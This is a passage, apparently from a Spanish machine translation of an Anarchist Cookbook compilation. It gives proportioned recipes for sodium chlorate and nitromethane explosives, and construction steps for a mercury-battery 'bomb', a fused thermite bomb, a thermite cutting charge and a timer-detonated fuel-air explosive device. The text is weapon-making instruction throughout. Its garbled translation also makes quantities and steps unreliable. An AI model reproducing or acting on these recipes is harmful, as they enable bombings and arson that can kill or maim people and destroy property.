Fórmulas de clorato de sodioEl clorato sódico es similar al clorato de potasio, y en la mayoría de los casos puede ser un sustituto. El clorato de sodio es también más soluble en agua. Usted puede encontrar el clorato de sodio en el canal o en cualquier tienda de mejoras de hardware / home. Se utiliza en sopletes y usted puede conseguir alrededor de 3 libras por alrededor de $ 6,00.

La pólvora de sodio Clorato• 65% de sodio clorato• 22% de carbón• 13% de azufre• Lluvia por la tarde de grafito en la parte superior

Rocket Fuel• 6 partes clorato de sodio • 5 partes de cemento de caucho• Mix * BIEN *

Cohete de combustible II (Mejor rendimiento)

• 50% de sodio clorato• 35% de caucho Cemento (marca de una sola capa ")• 10% de resina epoxi endurecedor• 5% de azufre

Es posible que desee agregar más clorato de sodio en función de la pureza que está utilizando.

Mezcla incendiaria• 55% de aluminio en polvo (atomizado)• 45% de sodio clorato• 5% de azufre

Page 333: 106652012 the Anarchy Cookbook 2000 Es

Impacto Mezcla• 50% de fósforo rojo• 50% de sodio clorato

A diferencia de clorato potásico, clorato de sodio no va a explotar espontáneamente cuando se mezcla con el fósforo. Tiene que ser golpeado para ser detonada.

Relleno explosiva• 85% de sodio clorato• 10% de vaselina• 5% de aluminio en polvo

Fórmulas de nitrometanoPensé que podría añadir esto, ya que es similar a la Astrolite.

• El nitrometano (CH3NO ²)• Gravedad específica: 1.139• Punto de inflamación: 95 ° F• Auto-Ignición: 785 ° F

Derivación: La reacción de metano o propano con ácido nítrico bajo presión.

Usos: los combustibles de cohetes; solventes para los compuestos de celulosa, polímeros, ceras, grasas, etc

Para ser detonada con una gorra de # 8, agregar:

1. 95% nitrometano + 5% de etilendiamina 2. 94% nitrometano + 6% de anilina

Potencia de salida: 22-24% más potente que el TNT. Velocidad de detonación de 6.200 MPS.

Nitrometano 'sólido' de explosivos• 2 partes nitrometano• 5 partes de nitrato de amonio (polvo sólido)

Deje en remojo durante 3-5 min. Cuando haya terminado, guardar en un recipiente hermético. Esto se supone que es 30% más potente que la dinamita que contiene 60% nitro-glicerina, y tiene brillo 30% más.

EL MERCURIO DE LA BATERÍA BOMBA! por el Agente Phucked!

Materiales:

• 1 Mercurio de la batería (1 ½ o 1,4 V de prótesis auditivas) • Una lámpara de trabajar con interruptor on / off

Es muy sencillo! ¡Hurra! Los niños menores de 18 años no deben considerar el intentar de éste o de lo contrario tendría el ácido de mercurio en sus caras!

1. Gire el interruptor de la lámpara para ver si lite-bombilla se enciende.2. Si el trabajo, deje el interruptor de encendido y desconecte el cable de3. Sacar la bombilla (No toque el punto caliente!)4. Coloque una pila de mercurio en el zócalo y asegúrese de que está en contacto con

el contacto de puntos calientes.5. Mover cualquier objeto o mueble - ¿Por qué? Puede haber chispas que se desprenden!6. Ahora tu parte favorita, un paso atrás y enchufe el cable en el zócalo.7. Y que te diviertas! Al igual que Real Party!

Page 334: 106652012 the Anarchy Cookbook 2000 Es

219.Thermite IV por Kilroy

Exención de responsabilidad:La fabricación y posesión de los siguientes dispositivos y las mezclas es probablemente ilegal en la mayoría de las comunidades. Los incendiarios son capaces de quemar más de 5400 ° F y son casi imposibles de extinguir. Si les hacen aceptar toda la responsabilidad por su posesión y uso. También acepta toda la responsabilidad por su propia estupidez y falta de cuidado. Esta información está destinada exclusivamente a educar. Todas las fórmulas son en peso

Termitas son un grupo de mezclas pirotecnia en el que un metal reactivo reduce el oxígeno a partir de un óxido metálico. Esto produce una gran cantidad de calor, la escoria y el metal puro. La termita más común es ferroaluminum termita, hecho de aluminio (metal reactivo) y óxido de hierro (óxido de metal). Cuando se quema se produce óxido de aluminio (escoria) y el hierro puro. La termita se utiliza generalmente para cortar o soldar los metales. Como un experimento, un ladrillo de tres libras de la termita fue colocado en un bloque motor de aluminio. Después de la termita se realizó la quema, sólo una pequeña porción de bloque se funde. Sin embargo, el bloque era muy deformado a cabo de forma más había grietas a lo largo del bloque. Ferro-termita produce alrededor de 930 calorías por gramo Las proporciones habituales de ferro-termita es un 25% de aluminio y el 75% de óxido de hierro El óxido de hierro por lo general utilizado no es el óxido (Fe2O3), pero la escala de hierro (Fe3O4). Rust funciona, pero es posible que desee ajustar la mezcla de óxido alrededor del 77%. El aluminio es generalmente polvo grueso para ayudar a frenar la velocidad de combustión. Los productos químicos se mezclan a fondo y se comprime en un recipiente adecuado. Una mezcla primer fuego se vierte en la parte superior y se enciende.

NOTA: termitas son en general muy seguro de mezclar y almacenar. No son golpes o sensible a la fricción y encenderse a unos 2000 ° C.

Una mezcla de fuego primero es una mezcla que se enciende más fácil que la termita y se quema lo suficientemente caliente como para encender la termita de forma fiable. Una muy buena es la siguiente:

• Nitrato de potasio 5 partes• Fine tierra de aluminio 3 partes • 2 partes de azufre

Mezclar el fondo y por encima de combinar 2 partes de él con 1 parte de polvo fino de ferro-termita. La mezcla resultante puede ser la luz por un fusible de seguridad y quemaduras intensas.

Un problema con termitas es la diferencia en peso entre el aluminio y el óxido de la. Esto hace que se separen a cabo la prestación de la termita inútil. Una forma de solucionar este problema es usar un aglutinante para mantener los productos químicos a la otra. El azufre es bueno para esto. Llamado Diasite, esta fórmula utiliza el azufre para obligar a todos los químicos juntos. Su desventaja es la termita se debe calentar para fundir el azufre.

• Óxido de hierro del 70%• Aluminio 23%• Azufre 7%

Mezclar el óxido de aluminio y juntos y ponerlos en un horno a 325 ° F y dejar que el calor se mezcla durante un rato. Cuando la mezcla esté caliente, espolvorear el azufre por encima y mezcle bien. Volver a colocarla en el horno durante unos minutos para fundir todo el azufre. Tire hacia atrás y mezcla de nuevo. Aunque todavía está caliente, carga en contenedores para su uso. Cuando se enfría, perforar el diasite una participación cercana al 10 - 15 gramos de mezcla de fuego primero. Cuando se quema diasite forma compuestos de sulfuro que emiten sulfuro de hidrógeno al entrar en

Page 335: 106652012 the Anarchy Cookbook 2000 Es

contacto con el agua. Este olor a huevo podrido puede obstaculizar los esfuerzos de lucha contra incendios. Termita se puede hacer no separar por compresión bajo un par de presión toneladas. El sedimento resultante es fuerte y se quema más lento que en polvo termita.

REPARTO termita: Esta fórmula puede ser puesto en moldes o recipientes y se endurece en una masa sólida. No produce tanto hierro como regular de ferro-termita, pero hace una escoria líquida que se mantiene mucho más tiempo. Hacer una mezcla de la siguiente manera.

• Yeso de París 2 partes• Finos y gruesos mixtos de aluminio 2 piezas • Óxido de hierro 3 partes

Mezcle bien y agregue suficiente agua para mojar el yeso. Vierta en un molde y dejar reposar durante media hora. Retirar cualquier exceso de agua que separa a la cima. Que esta seca en el sol por lo menos una semana. O secar al sol durante un día y poner en un 250 ° F horno durante un par de horas. Perforar a cabo por una mezcla primer incendio cuando se seca.

BOMBA Termita: La termita se puede hacer para explotar mediante la adopción de la fórmula de reparto de termita y la sustitución de aluminio en polvo fino para la mezcla de grueso / fino. Tomar 15 gramos de mezcla de primer fuego y poner en el centro de un pedazo de papel de aluminio. Inserte un fusible a prueba de agua en la mezcla y recoger el papel alrededor de la mecha. Impermeable al. Papel de aluminio / fusible con una capa delgada de cera Obtener un molde esférico de dos piezas con un diámetro de aproximadamente 4-5 pulgadas. La cera o aceite al interior del molde para ayudar a liberar la termita. Ahora, llenar una mitad del molde con la termita fundido. Poner la primera fuego / fusible del paquete en el centro del molde lleno. Completa la otra mitad del molde con la termita y ensamblar molde. El molde tiene que tener un agujero en él para el fusible que sobresale. En aproximadamente una hora, separar con cuidado el molde. Usted debe tener una bola de termita con la mezcla al fuego por primera vez en el centro de ella, y la mecha que sobresale de la pelota. Seque la pelota en el sol durante una semana. NO LO secar en un horno! El fusible se inflama la mezcla primer fuego que a su vez enciende la termita. Puesto que la termita se enciende desde el centro hacia fuera, el calor se acumula en la termita y se quema más rápido de lo normal. El resultado es una pequeña explosión. Las quemaduras de bolas de termita en una fracción de segundo y lanza de hierro fundido y la escoria alrededor. Use esto con cuidado!

Termita BIEN: Para cortar metal con termita, tomar un crisol refractario y perforar un 1/4 pulg agujero en el fondo. Epoxi una delgada (20 galones) hoja de acero al carbono sobre el agujero. Permitir el epoxi que se seque. Llene el crisol con ferro-termita e insertar un encendedor de fuego por primera vez en la termita. Moda un callejón sin salida a la placa. Este debe mantener el crisol de aproximadamente 1 ½ pulgadas para arriba. Coloque el bien por encima de su objetivo y encender el fuego en primer lugar. El pozo funciona de esta manera. Las quemaduras de termita, haciendo escoria y hierro. Dado que el hierro es más pesado que va al fondo del pozo. Las quemaduras de hierro fundido a través de la chapa metálica. Esto produce un pequeño retraso que da el hierro y escoria tiempo más para separar completamente. El hierro fundido gotea a través del agujero en el fondo del crisol. El separador permite la termita para continuar fluyendo fuera del crisol. La fuerza del hierro goteo perfora un agujero en el blanco. Una termita 2 libras y puede penetrar hasta 3/4 pulgadas de acero. Experimente con diferentes configuraciones para conseguir la máxima penetración. Para un crisol, intente una maceta revestida con una capa de óxido de magnesio. A veces el bote se agrieta sin embargo. Tome la fórmula de reparto de termita y agregue el 50% de ferro-termita a la misma. Esto produce una buena cantidad de hierro más una escoria muy líquido.

Termita de combustible y aire EXPLOSIÓN: Este es un dispositivo muy peligroso. Pregúntese si usted realmente realmente desea hacerlo antes de hacer cualquier trabajo en él. Es casi imposible dar a las dimensiones de los contenedores o el peso de los cargos debido a la disponibilidad de los cambios de partes de una persona a otra. Sin

Page 336: 106652012 the Anarchy Cookbook 2000 Es

embargo aquí hay una descripción general de este dispositivo conocido cariñosamente como HELLHOUND.

Hacer una carga de termita en un 1/8 pulgadas la pared del tubo. Este cargo debe ser de encendido eléctrico. En el extremo opuesto de la tubería de distancia desde el lado del encendedor poner una pequeña carga explosiva de polvo de flash peso de alrededor de 1 oz Perfore un pequeño agujero en una tapa de extremo de la tubería y poner los cables desde el dispositivo de encendido a través del orificio. Selle los cables y los agujeros con epoxi o cemento a prueba de combustible. Trate de casquillo de cemento disponible en tiendas de artículos deportivos. Dope las roscas de las tapas de los extremos con una droga de la buena pipa y atornillándolos en el tubo. Esto le da una carga de termita en un tubo de hierro dispuestas de modo que cuando la termita está encendido eléctrico, se quemará a partir de un extremo a otro, finalmente el ajuste de la carga de pólvora del flash. Coloque este dispositivo en un tubo más grande o un recipiente de metal muy fuerte que está sellado en un extremo. Utilice un par de metales "arañas" para mantener el dispositivo alejado de las paredes o en los extremos del recipiente más grande. Hacer pasar los cables a través de la pared del recipiente y sellar los cables con el epoxi prueba de combustible. Llenar el recipiente con un combustible líquido volátil. La acetona o gasolina funciona muy bien. Ahora sellar el recipiente con una tapa adecuada y se hace.

Las obras de este tipo de dispositivos: Conecte una fuente de temporizador de potencia a los cables. Cuando la termita se inflama se sobrecalienta el combustible líquido. Puesto que el recipiente es suficientemente fuerte para mantener la presión del combustible no hierva. Cuando la termita se quema para el explosivo, que explota la ruptura del contenedor y liberando el combustible sobrecalentado. El combustible se expande, enfriando y haciendo una fina niebla y el vapor que se mezcla con el aire circundante. La escoria de la termita en caliente también se lanza en el aire que enciende la mezcla aire-combustible. El resultado es obvio. Trate de alrededor de 1 ½ libras de la termita en un galón de combustible. Para el recipiente de presión, trate de una olla a presión de edad. Debido a que el combustible puede disolver la resina epoxi no se mantienen en torno a este dispositivo durante mucho tiempo. Pero hay que preguntarse, ¿realmente quieres hacer esto?

Termitas EXÓTICAS: termitas también se pueden hacer de teflón-magnesio o metal fluoruros-magnesio o aluminio. Si hay un exceso de compuesto de fluoruro en la mezcla, el gas flúor puede ser liberado. El flúor es extremadamente corrosivo y reactivo. El gas puede producir materia orgánica a punto de estallar en llamas por el mero contacto. Para el uso de teflón de teflón de magnesio 67% y 33% de magnesio. Un encendedor fuerte fuego primero se debe utilizar para encender esta mezcla. Tanto el teflón y el magnesio debe estar en forma de polvo. No inhalar el humo de la mezcla de la quema. Si se utiliza metal en lugar de teflón fluoruros, el uso de fluoruros de metales de baja energía. Fluoruro de plomo es un buen ejemplo. Intenta utilizando 90% de fluoruro de plomo y 10% de aluminio. Advertencia: Los compuestos de fluoruro pueden ser muy tóxicas. Ellos son aproximadamente iguales a los compuestos de cianuro. Otra mezcla exótica es el ortofosfato tricálcico y aluminio. Cuando este se quema, el fosfuro de calcio que se forma cuando el agua contactos comunicados de fosfuro de hidrógeno que puede inflamarse espontáneamente en el aire. Ortofosfato tricálcico tiene la fórmula Ca3 (PO4) 2 y que se conoce como blanca lockite. Use aproximadamente 75% de ortofosfato y 25% de aluminio. Esta relación puede tener que ser modificado para una mejor combustión, ya que no han experimentado con mucho y no sé si hay más de aluminio puede reducir el calcio en nuestro cuerpo. No funciona pero es un duro para inflamar la mezcla. Una mezcla de fuego primero contiene un pequeño porcentaje de magnesio funciona bien.

La lucha contra los incendios de termita: Dos maneras de luchar contra los incendios de termita se asfixia ya sea la termita de la arena. Esto no apagó la termita, pero sí ayudar a contener y bloquear que una parte del calor. La otra manera consiste en inundar la termita con una gran cantidad de agua. Esto ayuda a romper la termita aparte y detener la reacción. Si se utiliza una pequeña cantidad de agua, una explosión puede resultar como la termita puede reducir el gas hidrógeno del agua y la liberación. La termita puede provocar incendios por el calor que irradia de la reacción. Cerca de

Page 337: 106652012 the Anarchy Cookbook 2000 Es

sustancias inflamables pueden prenderse fuego a pesar de que haya chispas o llamas tocarlos.